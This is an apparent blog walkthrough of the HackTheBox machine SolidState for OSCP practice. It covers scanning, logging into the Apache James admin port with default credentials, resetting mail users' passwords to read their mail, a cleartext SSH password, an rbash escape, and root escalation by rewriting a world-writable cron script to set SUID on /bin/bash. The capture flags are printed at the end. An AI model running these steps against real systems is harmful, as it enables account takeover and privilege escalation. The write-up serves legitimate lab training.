HackTheBox | SolidState

In this walkthrough, I demonstrate how I obtained complete ownership of SolidState on HackTheBox
HackTheBox | SolidState
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

The usual SYN scan didn't work for me, so I tried a XMAS scan, which worked.

sudo nmap -sX -Pn -p- --min-rate 10000 -A -oN scan.txt $target

# Nmap 7.93 scan initiated Thu Apr  6 11:06:49 2023 as: nmap -sX -Pn -p- --min-rate 10000 -A -oN scan.txt 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.013s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 770084f578b9c7d354cf712e0d526d8b (RSA)
|   256 78b83af660190691f553921d3f48ed53 (ECDSA)
|_  256 e445e9ed074d7369435a12709dc4af76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.13 [10.10.14.13])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.93%I=7%D=4/6%Time=642EE01D%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPle
SF:ase\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswor
SF:d:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/6%OT=22%CT=1%CU=43689%PV=Y%DS=2%DC=T%G=Y%TM=642EE121
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT      ADDRESS
1   15.09 ms 10.10.14.1
2   15.04 ms 10.10.10.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr  6 11:11:29 2023 -- 1 IP address (1 host up) scanned in 280.34 seconds





Service Enumeration

TCP/80

Possible username next to the contact form

Gobuster Enumeration

gobuster dir -u http://10.10.10.51 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -r -t 200 -o gobuster.txt

/about.html           (Status: 200) [Size: 7183]
/index.html           (Status: 200) [Size: 7776]
/services.html        (Status: 200) [Size: 8404]
/assets               (Status: 200) [Size: 1496]
/images               (Status: 200) [Size: 2516]
/README.txt           (Status: 200) [Size: 963]
/LICENSE.txt          (Status: 200) [Size: 17128]



TCP/25, TCP/110, TCP/119, TCP/4555

Initial Enumeration

25/tcp   open  smtp    JAMES smtpd 2.3.2

Server banner

Potential exploits

I was looking at my notes and I had an entry for another Apache James target I tested. In my notes, I was able to connect to the Apache James remote administration port on TCP/4555 and login with the default credentials of root:root. I'm going to try that here:

ℹ️
When you first start the TCP connection with the server, it takes a moment before you're prompted to login. Be patient!
Login successful!
List the mail users and change each user's password to 'password'

Having changed all the of the mail users' passwords, I should be able to login to each user's mailbox and see if I can find any useful information.





Mapping User Mailboxes

I am going to add the mail domain to my /etc/hosts file, so that I can use the domain name when mapping the mailboxes.

Updating the Hosts File

sudo nano /etc/hosts

10.10.10.51    solid-state-security.com



Using Mutt to Map the Mailboxes

📧
I have some notes here about using Mutt to map POP3 mailboxes

The mail server running on the target does not have an IMAP server, so I'll be using some Mutt configuration files to map some mailboxes for those accounts which I changed the password.

James
set my_mailproto="pop"
set my_mailuser="james"
set my_mailpass="password"
set my_maildomain="solid-state-security.com"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set pop_host="$my_mailproto://$my_maildomain/"
set pop_user="$my_mailuser"
set pop_pass="$my_mailpass"
set pop_reconnect=yes
set pop_checkinterval=10
set pop_delete=no

james-muttrc example config

ℹ️
You can use this as a template for the other mailboxes. Just be sure to change the username and password as needed per user.
mutt -F ./james-muttrc

Run mutt with this config file

yes
This will take a moment, be patient
James' mailbox is empty





Thomas

Mailbox empty.





John
New Hires access... Sounds interesting

Press the Enter key to open the email.

Sounds like 'mindy' might have some creds in her mailbox

Press q to exit.





Mindy
  • Username: mindy
  • Password: P@55W0rd1!2@
You were saying...?





Mail Admin

Mailbox empty.





Exploit

This "award winning security team" left their mail administrative server configured with default credentials, allowing a user to manage user mailboxes with extreme ease. I was able to change the password on all mailbox accounts and read the contents of said mailboxes. One of the mailboxes contained a cleartext SSH credential.

Changing default passwords would prevent such attacks. It is also recommended to use SSH key authentication.



Breaking out of RBash

With SSH, you can interactively logon by specifying a connection string like the one pictured above:

ssh username@host

Basic connection syntax

But, it is also possible to run ad-hoc commands through SSH using a connection string like this:

ssh username@host <command-here>

SSH command syntax

Allow me to demonstrate:

'which' command is not in the user's PATH in rbash
'which' command is in the user's PATH before rbash is executed
Chaining commands, you need the quotes otherwise the ' | ' will be interpreted

Recalling from before the user mindy has several system binaries symbolically linked in /home/mindy/bin and this folder is also in Mindy's $PATH variable. So, using the ssh command we can link /bin/bash to /home/mindy/bin/bash and spawn a Bash subprocess to break out of rbash.

The command succeeds

I used this command to update the $PATH variable to add the proper system binaries:

export PATH=/usr/bin:/usr/sbin:/bin

Update the user's PATH variable





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

Current User

uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

sudo does not appear to be installed



Users and Groups

Local Users

james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash

Local Groups

osboxes:x:1000:
mindy:x:1001
    
cdrom:x:24:james
floppy:x:25:james
audio:x:29:pulse,james
dip:x:30:james
video:x:44:james
plugdev:x:46:james
netdev:x:108:james
bluetooth:x:112:james
lpadmin:x:114:james
scanner:x:116:saned,james



Network Configurations

Interfaces

ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:31:ec brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:31ec/64 scope global mngtmpaddr dynamic 
       valid_lft 86397sec preferred_lft 14397sec
    inet6 fe80::250:56ff:feb9:31ec/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   



Interesting Files

/opt/tmp.py

#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()





Privilege Escalation

Looking at /opt/tmp.py, it seemed like a Python script that would be run by a cron job. This script is being used to clear everything out of the /tmp folder recursively. So, I created a file /tmp/test and waited a bit while enumerating some other things. And sure enough, when I checked back later, /tmp/test was gone.

The Python script is world-writable

We can update this script with a Python payload of our choosing and see which user we can pivot to.

nano /opt/tmp.py

#!/usr/bin/env python
import os
import sys
try:
     os.system('chmod +s /bin/bash')
except:
     sys.exit()

Set the SUID bit on '/bin/bash'

Let's wait for the script to run and see if the SUID bit gets added to /bin/bash, which would do a couple of things:

  1. Confirm the script is being run by root
  2. Allow us to spawn a Bash process with root's SUID permissions, since root owns that binary
Nice! It worked!





Flags

User

2e0afac767cf3761362c9a8e12691a63

Root

1e2fc9def55e943cbb636110e2b8e9ae
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.